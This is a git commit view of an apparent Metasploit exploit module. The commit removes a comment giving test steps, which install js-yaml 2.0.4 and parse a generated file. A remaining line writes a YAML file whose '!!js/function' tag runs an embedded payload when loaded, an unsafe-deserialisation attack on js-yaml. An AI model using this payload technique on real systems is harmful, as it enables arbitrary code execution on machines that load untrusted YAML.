Kill explanatory comment.
parent
f954e5299f
commit
5fc724bced
|
@ -46,14 +46,3 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
file_create("a: !!js/function >\n (function(){ #{p} })();")
|
||||
end
|
||||
end
|
||||
|
||||
# Test steps:
|
||||
#
|
||||
# sudo npm i js-yaml@2.0.4
|
||||
#
|
||||
# #!/usr/bin/env node
|
||||
# // save this file to parse.js
|
||||
# var yaml = require('js_yaml');
|
||||
# yaml.load('msf.yml')
|
||||
#
|
||||
# node parse.js
|
||||
|
|
Loading…
Reference in New Issue